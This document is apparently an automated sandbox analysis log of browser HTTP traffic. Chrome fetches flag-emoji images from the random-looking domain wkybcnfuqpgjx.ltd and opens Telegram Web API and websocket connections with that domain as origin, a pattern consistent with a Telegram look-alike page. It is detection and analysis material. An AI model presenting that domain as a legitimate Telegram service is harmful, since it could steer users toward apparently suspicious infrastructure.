Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1fd.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1eb-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1f5.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiws HTTP/1.1Host: zws2.web.telegram.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://wkybcnfuqpgjx.ltdSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: OcDKOWvZ8QZMh09fyoOVdQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: binary
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1f5.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1e8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1f5.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f2-1f1f5.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f3-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
